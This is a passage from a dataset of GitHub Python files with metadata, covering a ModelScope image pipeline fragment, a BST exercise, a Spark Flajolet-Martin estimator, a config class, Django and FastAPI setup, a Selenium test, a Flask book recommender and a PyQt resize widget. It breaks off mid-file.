ret_tensor\n\n\ndef _image_context_seperator(img, color_context: dict, _tokenizer, neg: float):\n ret_lists = []\n if img is not None:\n w, h = img.size\n matrix = np.zeros((h, w))\n for color, v in 
color_context.items():\n color = tuple(color)\n if len(color) > 3:\n color = color[:3]\n if isinstance(color, str):\n r, g, b = color[1:3], color[3:5], color[5:7]\n color = (int(r, 16), int(g, 16), int(b, 16))\n img_where_color = (np.array(img) == color).all(axis=-1)\n matrix[img_where_color] = 1\n\n for color, (subject, weight_active) in color_context.items():\n if len(color) > 3:\n color = color[:3]\n v_input = _tokenizer(\n subject,\n max_length=_tokenizer.model_max_length,\n truncation=True,\n )\n\n v_as_tokens = v_input['input_ids'][1:-1]\n if isinstance(color, str):\n r, g, b = color[1:3], color[3:5], color[5:7]\n color = (int(r, 16), int(g, 16), int(b, 16))\n img_where_color = (np.array(img) == color).all(axis=-1)\n matrix[img_where_color] = 1\n if not img_where_color.sum() > 0:\n print(\n f'Warning : not a single color {color} not found in image')\n\n img_where_color_init = torch.where(\n torch.tensor(img_where_color, dtype=torch.bool), weight_active,\n neg)\n\n img_where_color = torch.where(\n torch.from_numpy(matrix == 1) & (img_where_color_init == 0.0),\n torch.tensor(neg), img_where_color_init)\n\n ret_lists.append((v_as_tokens, img_where_color))\n else:\n w, h = 768, 768\n\n if len(ret_lists) == 0:\n ret_lists.append(([-1], torch.zeros((w, h), dtype=torch.float32)))\n return ret_lists, w, h\n\n\ndef _extract_cross_attention(tokenizer, device, color_map_image, color_context,\n text_input, neg):\n # Process color map image and context\n seperated_word_contexts, width, height = _image_context_seperator(\n color_map_image, color_context, tokenizer, neg)\n\n # Compute cross-attention weights\n cross_attention_weight_1 = _tokens_img_attention_weight(\n seperated_word_contexts, text_input, ratio=1,\n original_shape=True).to(device)\n cross_attention_weight_8 = _tokens_img_attention_weight(\n seperated_word_contexts, text_input, ratio=8).to(device)\n cross_attention_weight_16 = _tokens_img_attention_weight(\n seperated_word_contexts, text_input, ratio=16).to(device)\n cross_attention_weight_32 = _tokens_img_attention_weight(\n seperated_word_contexts, text_input, ratio=32).to(device)\n cross_attention_weight_64 = _tokens_img_attention_weight(\n seperated_word_contexts, text_input, ratio=64).to(device)\n\n hidden_states = {\n 'CA_WEIGHT_ORIG': cross_attention_weight_1, # 768 x 768\n 'CA_WEIGHT_9216': cross_attention_weight_8, # 96 x 96\n 'CA_WEIGHT_2304': cross_attention_weight_16, # 48 x 48\n 'CA_WEIGHT_576': cross_attention_weight_32, # 24 x 24\n 'CA_WEIGHT_144': cross_attention_weight_64, # 12 x 12\n }\n\n uncond_hidden_states = {\n 'CA_WEIGHT_ORIG': 0,\n 'CA_WEIGHT_9216': 0,\n 'CA_WEIGHT_2304': 0,\n 'CA_WEIGHT_576': 0,\n 'CA_WEIGHT_144': 0,\n }\n\n return hidden_states, uncond_hidden_states\n\n\ndef _downsampling(img: torch.tensor, w: int, h: int) -> torch.tensor:\n return F.interpolate(\n img.unsqueeze(0).unsqueeze(1),\n size=(w, h),\n mode='bilinear',\n align_corners=True,\n ).squeeze()\n\n\ndef _latents_to_images(vae, latents, scale_factor=0.18215):\n \"\"\"Decode latents to PIL images.\"\"\"\n scaled_latents = 1.0 / scale_factor * latents.clone()\n images = vae.decode(scaled_latents).sample\n images = (images / 2 + 0.5).clamp(0, 1)\n images = images.detach().cpu().permute(0, 2, 3, 1).numpy()\n\n if images.ndim == 3:\n images = images[None, ...]\n images = (images * 255).round().astype('uint8')\n pil_images = [Image.fromarray(image) for image in images]\n\n return pil_images\n\n\ndef _sanitize_parameters(self, **pipeline_parameters):\n \"\"\"\n this method should sanitize the 
keyword args to preprocessor params,\n forward params and postprocess params on '__call__' or '_process_single' method\n\n Returns:\n Dict[str, str]: preprocess_params = {'image_resolution': self.model.get_resolution()}\n Dict[str, str]: forward_params = pipeline_parameters\n Dict[str, str]: postprocess_params = {}\n \"\"\"\n pipeline_parameters['image_resolution'] = self.model.get_resolution()\n pipeline_parameters['modelsetting'] = self.model.get_config()\n pipeline_parameters['model_dir'] = self.model.get_model_dir()\n pipeline_parameters['control_type'] = self.init_control_type\n pipeline_parameters['device'] = self.device\n","repo_name":"modelscope/modelscope","sub_path":"modelscope/pipelines/multi_modal/cone2_pipeline/cones2_inference_pipeline.py","file_name":"cones2_inference_pipeline.py","file_ext":"py","file_size_in_byte":18735,"program_lang":"python","lang":"en","doc_type":"code","stars":4825,"dataset":"github-code","pt":"16"}
+{"seq_id":"12989041603","text":"\"\"\"\nGiven a Tree class, create a method called add that accepts a Node, and inserts it into a tree such that the tree continues to be a Binary Search Tree. The method should return nothing.\n\nA Binary Search Tree is a tree where every node has values greater than its data on the right-hand side, and values less than its data on the left-hand side, and all of the sub-tree nodes follow suit. Here's an example:\n\"\"\"\nimport sys\nsys.setrecursionlimit(1000)\n\n\nclass Node:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n\n\nclass Tree:\n def __init__(self):\n self.root = None\n\n def print_bfs(self):\n if not self.root:\n return\n\n queue = [self.root]\n\n while len(queue) > 0:\n current_node = queue.pop(0)\n print(current_node.data)\n if current_node.left:\n queue.append(current_node.left)\n if current_node.right:\n queue.append(current_node.right)\n\n def in_order_traversal(self):\n nodes = []\n\n def dfs(node):\n if node:\n\n dfs(node.left)\n nodes.append(node.data)\n dfs(node.right)\n\n dfs(self.root)\n return nodes\n\n def add(self, node):\n if not self.root:\n self.root = node\n return\n\n def insert(root, node):\n\n if root.data > node.data:\n if root.left is None:\n root.left = node\n else:\n insert(root.left, node)\n else:\n\n if root.right is None:\n root.right = node\n else:\n insert(root.right, node)\n\n insert(self.root, node)\n","repo_name":"makhmudislamov/cti_ips_2020","sub_path":"mod12_trees/insert_node.py","file_name":"insert_node.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"20367162844","text":"import random\nimport binascii\nfrom statistics import mean,median\nfrom datetime import datetime\nimport findspark\nfindspark.init()\nfindspark.find()\nimport pyspark\nimport random\nimport json\nimport sys\nfrom pyspark import SparkContext, SparkConf\nfrom pyspark.streaming import StreamingContext\n\ndef Prime_check(num):\n if num<=1:\n return False\n if num<=3:\n return True\n if num%2==0 or num%3==0:\n return False\n k = 5\n while k*k <= num:\n if (num%k == 0 or num%(k+2)==0):\n return False\n k=k + 6\n return True\n\n\n\ndef hasNumbers(inputString):\n for char in inputString:\n if char.isdigit() or inputString=='':\n return True\n if inputString=='':\n return True\n else:\n return False\n \n\n\ndef hashed_values2(hashfunction,conv_value,m):\n calc=((((hashfunction[0]*conv_value)+hashfunction[1])%hashfunction[2])%m)\n return calc\n\n\nhash_count=9\nrandom.seed(9001)\na = random.choices([x for x in range(1000, 30000) if Prime_check(x)], k=hash_count+1)\nb = random.choices([x for x in range(1000, 30000) if Prime_check(x)], k=hash_count+1) \ngenerated_prime = random.choices([x for x in range(1000000000, 1000000100) if Prime_check(x)],k=hash_count+1)\nhashed_list=[]\nfor points in zip(a,b,generated_prime):\n hashed_list.append([points[0],points[1],points[2]])\n \n\n\ndef Flajolet_Martin(stream):\n sizeGroup=3\n numHashes=9\n city_list=stream.collect()\n #print(len(city_list))\n m=2**(numHashes)\n true_value=len(set(city_list))\n #print(true_value)\n global hashed_list\n global outputFile\n \n L=[]\n for hashes in hashed_list:\n max_value=-1\n for cities in city_list:\n v=hasNumbers(cities)\n if v:\n pass\n else:\n hashing=int(binascii.hexlify(cities.encode('utf8')), 16)\n #print(hashing)\n hashed_value=hashed_values2(hashes,hashing,m)\n #print(hashed_value)\n #print(hashed_value)\n hashed_value=bin(hashed_value)[2:]\n length=len(hashed_value)-len(hashed_value.rstrip('0'))\n if (length > max_value):\n max_value = length\n #tail_zero.append(length)\n #max_value=max(tail_zero)\n L.append(2**max_value) \n Index_start=0\n groupAvgs=[] \n for end_Index in range(sizeGroup, numHashes, sizeGroup):\n groupAvgs.append(mean(L[Index_start:end_Index]))\n Index_start=end_Index\n estimated_value=median(groupAvgs)\n current_timestamp = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n out = str(current_timestamp) + \",\" + str(true_value) + \",\" + str(estimated_value) + \"\\n\"\n outputFile.write(out)\n outputFile.flush()\n return\n\n\n\nif __name__ == \"__main__\":\n print('Mohan')\n port=int(sys.argv[1])\n output_file_path=sys.argv[2]\n\n batch_size=5 \n \n\n sc = SparkContext('local[*]','test')\n sc.setLogLevel(\"OFF\")\n ssc = StreamingContext(sc, batch_size)\n dataRDD = ssc.socketTextStream(\"localhost\", port)\n\n\n outputFile = open(output_file_path, \"w\", encoding=\"utf-8\")\n out=\"Time,Ground Truth,Estimation\"+\"\\n\"\n outputFile.write(out)\n\n \n business_rdd=dataRDD.map(lambda x:json.loads(x))\n city_rdd=business_rdd.map(lambda x:x['city'])\n city_list=city_rdd.window(30, 10).foreachRDD(Flajolet_Martin)\n \n \n ssc.start()\n ssc.awaitTermination()\n\n\n\n","repo_name":"thotamohan/Spark-streaming","sub_path":"FlajoletMartin.py","file_name":"FlajoletMartin.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"34279681447","text":"import datetime\nimport utils\nimport threading\nimport uuid\n\nclass Config:\n DEFAULT_CONFIG_SELF = {}\n\n DEFAULT_CONFIG = {\n 'settings': lambda: {},\n 'timestamp': lambda: datetime.datetime.now()\n }\n\n def __init__(self, config=None):\n self.run_default_config() # Always run this first\n self.logger = utils.setup_logger(self, 'DEBUG') # Always run this second\n\n if config:\n self.run_config(config) # Run the config if it exists\n\n def run_default_config(self):\n for key, default_value_func in self.DEFAULT_CONFIG_SELF.items():\n setattr(self, key, default_value_func(self))\n for key, default_value_func in self.DEFAULT_CONFIG.items():\n setattr(self, key, default_value_func())\n\n def run_config(self, config):\n for key, value in config.items():\n if hasattr(self, key) and not key.startswith('_'): # Skip these attributes\n setattr(self, key, value)\n self.logger.info(f\"Updated config for {self.__class__.__name__} with {config}\")\n\n # ... rest of your code ...\n\n def update(self, updates):\n if not isinstance(updates, dict):\n raise TypeError('updates should be a dictionary')\n self.settings.update(updates)\n self.timestamp = datetime.datetime.now()\n\n\n def __getitem__(self, key):\n try:\n return self.settings[key]\n except KeyError:\n raise KeyError(f'The key \"{key}\" does not exist in the configuration settings.')\n\n def get(self, key, default=None):\n return self.settings.get(key, default)\n\n def __contains__(self, key):\n return key in self.settings\n\n def __repr__(self):\n safe_settings = {k: '***' if k.lower().endswith('password') else v for k, v in self.settings.items()}\n return f'Config({safe_settings})'\n\n def __str__(self):\n safe_settings = {k: '***' if k.lower().endswith('password') else v for k, v in self.settings.items()}\n return f'Config({safe_settings})'\n\n\nclass DefaultBotConfig:\n REQUIRED_KEYS = ['id', 'inventory', 'logger', 'lock', 'port', 'state', 'memory', 'brain']\n DEFAULT_CONFIG = {\n 'id': lambda: str(uuid.uuid4()),\n 'inventory': lambda: {'items': []},\n 'lock': lambda: threading.Lock(),\n '_created_at': lambda: datetime.datetime.now(),\n '_updated_at': lambda: datetime.datetime.now(),\n '_parent': lambda: None,\n '_logger_level': 'DEBUG',\n '_restricted_config_keys': lambda: {'id', 'port', 'state', 'memory', 'logger', 'lock'},\n 'is_thinking': False,\n 'is_updating': False,\n 'is_active': True,\n 'has_controller': False,\n }\n\n def __init__(self, custom_config=None):\n self.config = self.DEFAULT_CONFIG.copy()\n if custom_config:\n self.config.update(custom_config)\n self._verify_config()\n\n def _verify_config(self):\n for key in self.REQUIRED_KEYS:\n if key not in self.config:\n raise ValueError(f\"Missing required config key: {key}\")\n\n","repo_name":"ctavolazzi/winfobot","sub_path":"digital_highway/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"}
+{"seq_id":"32656331189","text":"from django.urls import path\n\nfrom . views import RoomList,BookingListView, RoomDetailView, cancelBookingview\n\napp_name='hotelapp'\n\nurlpatterns = [\n path('room_list/', RoomList, name='RoomList'),\n path('booking_list/', BookingListView.as_view(), name='BookingListView'),\n path('room/', RoomDetailView.as_view(), name='RoomDetailView'),\n path('booking/cancel/', cancelBookingview.as_view(), name='cancelBookingview'),\n \n]\n\n","repo_name":"ManvithaSukhavasi/room_booking","sub_path":"hotel/hotelapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"4942014205","text":"import fastapi_users\nfrom fastapi import FastAPI\nfrom starlette.requests import Request\n\nfrom config import SECRET_KEY\nfrom core.db import database\nfrom core.fast_users import fastusers\nfrom task_app.routes import tasks_router\nfrom user_auth.jwt_config import jwt_authentication \nfrom user_auth.schemas import User\n\n\napp = FastAPI()\napp.include_router(\n fastusers.get_auth_router(jwt_authentication),\n prefix=\"/users\",\n tags=[\"users\"],\n)\napp.include_router(\n fastusers.get_register_router(),\n prefix=\"/users\",\n tags=[\"users\"],\n)\napp.include_router(\n fastusers.get_reset_password_router(SECRET_KEY),\n prefix=\"/users\",\n tags=[\"users\"],\n)\napp.include_router(\n fastusers.get_users_router(),\n prefix=\"/users\",\n tags=[\"users\"],\n)\napp.include_router(tasks_router, prefix=\"/tasks\", tags=[\"tasks\"])\n\n\n@app.on_event(\"startup\")\nasync def startup():\n await database.connect()\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown():\n await database.disconnect()\n\n\n# @fastusers.on_after_register()\n# def on_after_register(user: User, request: Request):\n# print(f\"User {user.id} has registered.\")\n\n\n# @fastusers.on_after_forgot_password()\n# def on_after_forgot_password(user: User, token: str, request: Request):\n# print(f\"User {user.id} has forgot their password. Reset token: {token}\")\n\n\n","repo_name":"StepanovSerjant/TestAppvelox","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70171785610","text":"from PIL import ImageGrab, ImageDraw\nimport scree_lib.eink as eink\n\nim = ImageGrab.grab(bbox=(0,0,800,480))\n\nepd = eink.EPD()\n\nepd.init()\nepd.Clear()\nepd.display(epd.getbuffer(im))\nepd.sleep()","repo_name":"firewallfail/eink-weather","sub_path":"update_screen.py","file_name":"update_screen.py","file_ext":"py","file_size_in_byte":192,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"40708047258","text":"import unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.support.ui import Select\nfrom time import sleep\n\n\nclass TestingMercadoLibre(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n s = Service('../chromedriver')\n cls.driver = webdriver.Chrome(service=s)\n driver = cls.driver\n driver.get(\"http://www.mercadolibre.com/\")\n driver.maximize_window()\n\n def test_serch_ps4(self):\n items = {}\n driver = self.driver\n country = driver.find_element(By.ID, 'CO')\n country.click()\n search_field = driver.find_element(By.NAME, 'as_word')\n search_field.click()\n search_field.clear()\n search_field.send_keys('playstation 4')\n search_field.submit()\n\n location = driver.find_element(By.XPATH, '//*[@id=\"root-app\"]/div/div/aside/section/div[6]/ul/li[1]/a/span[1]')\n driver.execute_script(\"arguments[0].click()\", location)\n sleep(3)\n\n codition = driver.find_element(By.PARTIAL_LINK_TEXT, 'Nuevo')\n codition.click()\n sleep(3)\n\n order_menu = driver.find_element(By.CSS_SELECTOR, '#root-app > div > div > section > div.ui-search-view-options__container > div > div > div > div.ui-search-sort-filter > div > div > button > span')\n order_menu.click()\n higher_price = driver.find_element(By.CSS_SELECTOR, '#root-app > div > div > section > div.ui-search-view-options__container > div > div > div > div.ui-search-sort-filter > div > div > div > ul > a:nth-child(3)')\n higher_price.click()\n sleep(3)\n\n for i in range(5):\n article_name = driver.find_element(By.XPATH, f'//*[@id=\"root-app\"]/div/div/section/ol/li[{i + 1}]/div/div/div[2]/div[1]/a/h2').text\n article_price = driver.find_element(By.XPATH, f'//*[@id=\"root-app\"]/div/div/section/ol/li[{i + 1}]/div/div/div[2]/div[2]/div[1]/div[1]/div/div/div/span[1]/span[2]/span[2]').text\n items[article_name] = article_price\n print(items)\n\n @classmethod\n def tearDownClass(cls):\n cls.driver.quit()\n\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","repo_name":"JavierLGZ/selenium-platzi","sub_path":"prueba_tecnica/mercadolibre.py","file_name":"mercadolibre.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"36040003994","text":"from flask import Flask,render_template,request \r\nimport pandas as pd\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.metrics.pairwise import cosine_similarity,linear_kernel \r\nfrom flask import Flask, render_template, request, jsonify\r\nimport pandas as pd\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.metrics.pairwise import cosine_similarity,linear_kernel \r\nfrom flask import Flask, render_template, request, jsonify\r\nimport numpy as np\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\n\r\nmodel = tf.keras.models.load_model('my_model.h5')\r\napp = Flask(__name__)\r\ndef load_data(data):\r\n df= pd.read_csv(data, sep= ';', error_bad_lines= False, encoding= 'latin-1')\r\n df=df.head(500)\r\n return df\r\n\r\ndef search_term_if_not_found(term,df):\r\n term = term.capitalize()\r\n result_df= df[df['Book-Title'].str.contains(term)]\r\n return result_df['Book-Title'].iloc[0] \r\n\r\ndef vectorize_text_to_cosine_max(data):\r\n count_vec= CountVectorizer()\r\n cv_mat= count_vec.fit_transform(data)\r\n cosine_sim=cosine_similarity(cv_mat)\r\n return cosine_sim\r\n# \r\ndef get_recommendation(title,cosine_sim_mat,df,num_of_rec=8):\r\n course_indices=pd.Series(df.index,index=df['Book-Title']).drop_duplicates()\r\n idx=course_indices[title]\r\n sim_scores=list(enumerate(cosine_sim_mat[idx]))\r\n sim_scores= sorted(sim_scores,key=lambda x:x[1],reverse=True)\r\n selected_course_indices=[i[0] for i in sim_scores[1:]]\r\n selected_course_score=[i[0] for i in sim_scores[1:]]\r\n result_df= df.iloc[selected_course_indices] \r\n result_df['similarity score']=selected_course_score\r\n final_recommeded= result_df[['Book-Title','Book-Author','Year-Of-Publication','similarity score','Image-URL-L']]\r\n return final_recommeded.head(num_of_rec)\r\ndf=load_data('https://raw.githubusercontent.com/tttgm/fellowshipai/master/book_crossing_dataset/BX-Books.csv')\r\ncosine_sim_mat=vectorize_text_to_cosine_max(df['Book-Title'])\r\ndef get_suggestions():\r\n data = pd.read_csv(\"https://raw.githubusercontent.com/sahilpocker/Book-Recommender-System/master/Dataset/books.csv\")\r\n return list(data['title'].str.capitalize())\r\n@app.route('/')\r\ndef login():\r\n return render_template(\"login.html\")\r\ndatabase={'diane':'123','james':'aac','karthik':'asdsf'}\r\n\r\n@app.route('/form_login',methods=['POST','GET'])\r\ndef login_page():\r\n df=pd.read_csv('https://raw.githubusercontent.com/Diane10/movies/main/most_rated_books_summary_noerros.csv')\r\n titles = df['book_title']\r\n authors=df['book_author']\r\n years=df['year_of_publication']\r\n # scores=df['similarity score']\r\n images = df['image_url_l']\r\n df_rating=pd.read_csv('https://raw.githubusercontent.com/Diane10/movies/main/books_summary_noerros.csv')\r\n titles_rating = df_rating['book_title']\r\n authors_rating=df_rating['book_author']\r\n years_rating=df_rating['year_of_publication']\r\n images_rating = df_rating['image_url_l']\r\n name1=request.form['username']\r\n sytem=request.form['sytem']\r\n pwd=request.form['password']\r\n # COLLABORATIVE\r\n df= pd.read_csv('https://raw.githubusercontent.com/Diane10/movies/main/Finalcollab.csv')\r\n coll_titles = df['book_title']\r\n coll_authors=df['book_author']\r\n coll_years=df['year_of_publication']\r\n coll_images= df['image_url_l']\r\n\r\n if name1 not in database:\r\n return render_template('login.html',info='Invalid User')\r\n else:\r\n if database[name1]!=pwd:\r\n return 
render_template('login.html',info='Invalid Password')\r\n else:\r\n if sytem ==\"content based\":\r\n return render_template('content.html',coll_images=coll_images,coll_years=coll_years,coll_titles=coll_titles,coll_authors=coll_authors,name=name1,title = titles,author=authors,year = years,image=images,titles_rating=titles_rating,authors_rating=authors_rating,years_rating=years_rating,images_rating=images_rating)\r\n elif sytem == \"collaborative based\":\r\n return render_template('collaborative.html',coll_images=coll_images,coll_years=coll_years,coll_titles=coll_titles,coll_authors=coll_authors,name=name1,title = titles,author=authors,year = years,image=images,titles_rating=titles_rating,authors_rating=authors_rating,years_rating=years_rating,images_rating=images_rating)\r\n\r\n@app.route('/predict', methods = ['POST']) # /result route Ratingsreviews\r\ndef predict():\r\n name = request.form['book_name']\r\n searchdf = df[df['Book-Title']== name]\r\n searchtitles = searchdf['Book-Title']\r\n searchauthors= searchdf['Book-Author']\r\n searchyears= searchdf['Year-Of-Publication']\r\n # scores=result['similarity score']\r\n searchimages = searchdf['Image-URL-L']\r\n df_rating=pd.read_csv('https://raw.githubusercontent.com/Diane10/movies/main/mostrated.csv')\r\n titles_rating = df_rating['book_title']\r\n authors_rating=df_rating['book_author']\r\n # years=df['year_of_publication']\r\n scores_rating=df_rating['ratings']\r\n images_rating = df_rating['image_url_l']\r\n if name is not None:\r\n try :\r\n result= get_recommendation(name,cosine_sim_mat,df,8)\r\n titles = result['Book-Title']\r\n authors=result['Book-Author']\r\n years=result['Year-Of-Publication']\r\n # scores=result['similarity score']\r\n images = result['Image-URL-L']\r\n suggestions= get_suggestions()\r\n except:\r\n name= search_term_if_not_found(name,df)\r\n searchdf = df[df['Book-Title']== name]\r\n searchtitles = searchdf['Book-Title']\r\n searchauthors= searchdf['Book-Author']\r\n searchyears= searchdf['Year-Of-Publication']\r\n # scores=result['similarity score']\r\n searchimages = searchdf['Image-URL-L']\r\n result= get_recommendation(name,cosine_sim_mat,df,8)\r\n titles = result['Book-Title']\r\n authors=result['Book-Author']\r\n years=result['Year-Of-Publication']\r\n # scores=result['similarity score']\r\n images = result['Image-URL-L']\r\n suggestions= get_suggestions()\r\n return render_template('Recommender.html',titles_rating=titles_rating,authors_rating=authors_rating, scores_rating=scores_rating,images_rating=images_rating,title = titles,author=authors,year = years,image=images,suggestions=suggestions,searchtitles=searchtitles,searchauthors=searchauthors,searchyears=searchyears,searchimages=searchimages)\r\n@app.route('/content/', methods=['GET'])\r\ndef book_content_recommend(title):\r\n name = str(title)\r\n if name is not None:\r\n books_searched=df[df['Book-Title']==name]\r\n searched_title = books_searched['Book-Title']\r\n searched_author= books_searched['Book-Author']\r\n searched_years= books_searched['Year-Of-Publication']\r\n searched_images= books_searched['Image-URL-L']\r\n result= get_recommendation(name,cosine_sim_mat,df,8)\r\n titles = result['Book-Title']\r\n authors=result['Book-Author']\r\n years=result['Year-Of-Publication']\r\n images = result['Image-URL-L']\r\n return render_template('content_result.html',searched_years=searched_years,searched_images=searched_images,searched_title=searched_title,searched_author=searched_author,title = titles,author=authors,year = 
years,images=images)\r\n\r\n@app.route('/book/', methods=['GET'])\r\ndef book_collaborative_recommend(coll_titles):\r\n name = str(coll_titles)\r\n combine_book_rating_data=pd.read_csv('https://raw.githubusercontent.com/Diane10/movies/main/Finalcollab.csv')\r\n books_df_s=combine_book_rating_data[combine_book_rating_data['book_title']==name]\r\n titles_searched = books_df_s['book_title']\r\n authors_searched=books_df_s['book_author']\r\n year_searched = books_df_s['year_of_publication']\r\n images_searched = books_df_s['image_url_l']\r\n user_id = books_df_s['user']\r\n user_id=user_id.iloc[0]\r\n user_r = user_id\r\n b_id =list(combine_book_rating_data.user.unique())\r\n book_arr = np.array(b_id) #get all book IDs\r\n user = np.array([user_r for i in range(len(b_id))])\r\n pred = model.predict([book_arr, user])\r\n pred = pred.reshape(-1) #reshape to single dimension\r\n pred_ids = (-pred).argsort()[0:10]\r\n top10 = combine_book_rating_data.iloc[pred_ids]\r\n f=['book_title','book_author','year_of_publication','image_url_l']\r\n displ=(top10[f])\r\n c_title = displ['book_title']\r\n c_authors = displ['book_author']\r\n c_small_image_url= displ['image_url_l']\r\n c_years= displ['year_of_publication']\r\n return render_template('result.html',year_searched=year_searched,c_years=c_years,images_searched=images_searched,authors_searched=authors_searched,titles_searched=titles_searched,c_title=c_title,c_authors=c_authors,c_small_image_url=c_small_image_url)\r\nif __name__ == '__main__':\r\n app.run(debug=True,use_reloader=False)\r\n","repo_name":"Diane10/Book_Recommender_App","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"37866306958","text":"from PyQt5.QtCore import (\n Qt,\n QSize,\n QRect,\n pyqtSignal,\n QPoint\n)\nfrom PyQt5.QtGui import (\n QPen,\n QPainter\n)\nfrom PyQt5.QtWidgets import (\n QWidget\n)\n##\n# A special widget designed as an aid for resizing a canvas. Based on a\n# similar widget used by the GIMP.\n##\nclass ResizeHelper(QWidget):\n offsetChanged = pyqtSignal(QPoint)\n offsetXChanged = pyqtSignal(int)\n offsetYChanged = pyqtSignal(int)\n offsetBoundsChanged = pyqtSignal(QRect)\n\n def __init__(self, parent = None):\n super().__init__(parent)\n \n self.mMouseAnchorPoint = QPoint()\n self.mOffset = QPoint()\n self.mOldSize = QSize()\n self.mDragging = False\n self.mOffsetBounds = QRect()\n self.mScale = 0.0\n self.mNewSize = QSize()\n self.mOrigOffset = QPoint()\n \n self.setMinimumSize(20, 20)\n self.setOldSize(QSize(1, 1))\n\n def oldSize(self):\n return self.mOldSize\n\n def newSize(self):\n return self.mNewSize\n\n def offset(self):\n return self.mOffset\n\n def offsetBounds(self):\n return self.mOffsetBounds\n\n def setOldSize(self, size):\n self.mOldSize = size\n self.recalculateMinMaxOffset()\n self.recalculateScale()\n\n def setNewSize(self, size):\n self.mNewSize = size\n self.recalculateMinMaxOffset()\n self.recalculateScale()\n\n def setOffset(self, offset):\n # Clamp the offset within the offset bounds\n newOffset = QPoint(min(self.mOffsetBounds.right(),\n max(self.mOffsetBounds.left(), offset.x())),\n min(self.mOffsetBounds.bottom(),\n max(self.mOffsetBounds.top(), offset.y())))\n if (self.mOffset != newOffset):\n xChanged = self.mOffset.x() != newOffset.x()\n yChanged = self.mOffset.y() != newOffset.y()\n self.mOffset = newOffset\n if (xChanged):\n self.offsetXChanged.emit(self.mOffset.x())\n if (yChanged):\n self.offsetYChanged.emit(self.mOffset.y())\n self.offsetChanged.emit(self.mOffset)\n self.update()\n\n ## Method to set only the X offset, provided for convenience. */\n def setOffsetX(self, x):\n self.setOffset(QPoint(x, self.mOffset.y()))\n\n ## Method to set only the Y offset, provided for convenience. */\n def setOffsetY(self, y):\n self.setOffset(QPoint(self.mOffset.x(), y))\n\n ## Method to set only new width, provided for convenience. */\n def setNewWidth(self, width):\n self.mNewSize.setWidth(width)\n self.recalculateMinMaxOffset()\n self.recalculateScale()\n\n ## Method to set only new height, provided for convenience. 
*/\n def setNewHeight(self, height):\n self.mNewSize.setHeight(height)\n self.recalculateMinMaxOffset()\n self.recalculateScale()\n\n def paintEvent(self, event):\n _size = self.size() - QSize(2, 2)\n if (_size.isEmpty()):\n return\n origX = (_size.width() - self.mNewSize.width() * self.mScale) / 2 + 0.5\n origY = (_size.height() - self.mNewSize.height() * self.mScale) / 2 + 0.5\n oldRect = QRect(self.mOffset, self.mOldSize)\n painter = QPainter(self)\n painter.translate(origX, origY)\n painter.scale(self.mScale, self.mScale)\n pen = QPen(Qt.black)\n pen.setCosmetic(True)\n painter.setPen(pen)\n painter.drawRect(QRect(QPoint(0, 0), self.mNewSize))\n pen.setColor(Qt.white)\n painter.setPen(pen)\n painter.setBrush(Qt.white)\n painter.setOpacity(0.5)\n painter.drawRect(oldRect)\n pen.setColor(Qt.black)\n pen.setStyle(Qt.DashLine)\n painter.setOpacity(1.0)\n painter.setBrush(Qt.NoBrush)\n painter.setPen(pen)\n painter.drawRect(oldRect)\n painter.end()\n\n def mousePressEvent(self, event):\n self.mMouseAnchorPoint = event.pos()\n self.mOrigOffset = self.mOffset\n self.mDragging = event.button() == Qt.LeftButton\n\n def mouseMoveEvent(self, event):\n if (not self.mDragging):\n return\n pos = event.pos()\n if (pos != self.mMouseAnchorPoint):\n self.setOffset(self.mOrigOffset + (pos - self.mMouseAnchorPoint) / self.mScale)\n self.offsetChanged.emit(self.mOffset)\n\n def resizeEvent(self, event):\n self.recalculateScale()\n\n def recalculateScale(self):\n _size = self.size() - QSize(2, 2)\n if (_size.isEmpty()):\n return\n if self.mOldSize.width() < self.mNewSize.width():\n width = self.mNewSize.width()\n else:\n width = 2 * self.mOldSize.width() - self.mNewSize.width()\n if self.mOldSize.height() < self.mNewSize.height():\n height = self.mNewSize.height()\n else:\n height = 2 * self.mOldSize.height() - self.mNewSize.height()\n\n # Pick the smallest scale\n scaleW = _size.width() / width\n scaleH = _size.height() / height\n if scaleW < scaleH:\n self.mScale = scaleW\n else:\n self.mScale = scaleH\n\n self.update()\n\n def recalculateMinMaxOffset(self):\n offsetBounds = self.mOffsetBounds\n if (self.mOldSize.width() <= self.mNewSize.width()):\n offsetBounds.setLeft(0)\n offsetBounds.setRight(self.mNewSize.width() - self.mOldSize.width())\n else:\n offsetBounds.setLeft(self.mNewSize.width() - self.mOldSize.width())\n offsetBounds.setRight(0)\n\n if (self.mOldSize.height() <= self.mNewSize.height()):\n offsetBounds.setTop(0)\n offsetBounds.setBottom(self.mNewSize.height() - self.mOldSize.height())\n else:\n offsetBounds.setTop(self.mNewSize.height() - self.mOldSize.height())\n offsetBounds.setBottom(0)\n\n if 